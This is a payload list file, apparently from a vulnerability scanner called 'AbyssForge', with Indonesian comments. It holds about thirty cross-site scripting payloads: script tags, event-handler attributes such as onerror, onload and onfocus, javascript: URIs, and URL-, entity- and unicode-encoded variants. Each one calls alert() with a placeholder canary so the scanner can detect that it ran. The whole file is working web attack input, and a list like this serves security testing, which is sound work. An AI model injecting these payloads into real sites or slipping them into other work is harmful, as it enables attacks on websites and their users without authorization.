# AbyssForge - XSS Payloads
# CANARY = placeholder yang akan diganti dengan canary unik

<script>alert(1)</script>
<script>alert('CANARY')</script>
"><script>alert('CANARY')</script>
'><script>alert('CANARY')</script>
<img src=x onerror=alert('CANARY')>
<img src=x onerror=alert(1)>
"><img src=x onerror=alert('CANARY')>
'><img src=x onerror=alert(1)>
<svg onload=alert('CANARY')>
"><svg onload=alert(1)>
<body onload=alert('CANARY')>
<iframe onload=alert(1)></iframe>
javascript:alert('CANARY')
<a href="javascript:alert(1)">click</a>
"><a href="javascript:alert(1)">XSS</a>
<input onfocus=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<video><source onerror="javascript:alert(1)">
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<math><mtext></mtext><mo></mo><malignmark></malignmark></math>
<table><td background="javascript:alert(1)">
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
%3Cscript%3Ealert(1)%3C/script%3E
&lt;script&gt;alert(1)&lt;/script&gt;
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
\u003cscript\u003ealert(1)\u003c/script\u003e
